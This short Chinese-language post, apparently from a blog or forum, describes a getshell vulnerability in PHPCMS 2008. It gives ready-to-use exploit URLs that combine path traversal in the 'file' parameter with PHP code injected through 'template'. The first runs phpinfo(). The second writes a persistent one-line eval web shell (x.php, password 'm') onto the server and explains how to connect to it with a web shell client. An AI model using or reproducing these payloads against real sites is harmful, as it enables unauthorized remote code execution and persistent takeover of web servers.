关于phpcms 2008 getshell漏洞 拿shell
http://www.wooyun.org/bugs/wooyun-2010-09563
这个 注册企业会员 然后链接放exp info就出来了
EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>
不过呢 写一句话 shell 那样的话 用菜刀链接 就不行。。
这里找到一个好方法 就是。。写在目录下面。。包含一句话
localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php fwrite(fopen(‘x.php’,'a’),’<?php @eval($_POST[m])?>’);exit();?>
链接方法: localhost/yp/business/x.php 密码 m
联系客服